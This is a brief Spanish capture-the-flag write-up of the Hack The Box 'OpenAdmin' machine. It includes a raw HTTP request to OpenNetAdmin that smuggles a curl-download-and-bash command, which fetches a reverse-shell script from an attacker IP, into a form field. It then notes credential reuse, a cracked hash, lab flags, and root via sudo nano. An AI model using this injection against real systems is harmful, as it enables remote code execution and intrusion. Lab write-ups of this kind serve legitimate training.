f4d3

f4d3

InfoSec enthusiast | pwn | RE | CTF | BugBounty

HTB{openadmin}

http://10.10.10.171/

Recon

http://10.10.10.171/ona/

Open admin aquí.

POST /ona/ HTTP/1.1
Host: 10.10.10.171
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.171/ona/
Method: POST http://10.10.10.171/ona/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
Connection: close
Cookie: ona_context_name=DEFAULT; ONA_SESSION_ID=4aerblt73idp6e282pgkllshv9
Cache-Control: max-age=0

xajax=window_submit&xajaxr=1580249126544&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;/usr/bin/curl 10.10.14.24:8000/reverse.sh > /tmp/f4d3.sh;bash /tmp/f4d3.sh%26&xajaxargs[]=ping

Got shell!

on www/local/config/database_settings.php

21232f297a57a5a743894a0e4a801fc3	md5	admin
098f6bcd4621d373cade4e832627b4f6	md5	test

no sirven de nada, pero podemos reutilizar la pass de la db como jimmy :D

Hacemos un port forwarding…

el hash

00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
crack => Revealed

user.txt:c9b2cf07d40807e62af62660f0c81b5f

Root

para el root, vemos que podemos correr nano con sudo :D

GTFOBINS

root.txt:2f907ed450b361b2c2bf4e8795d5b561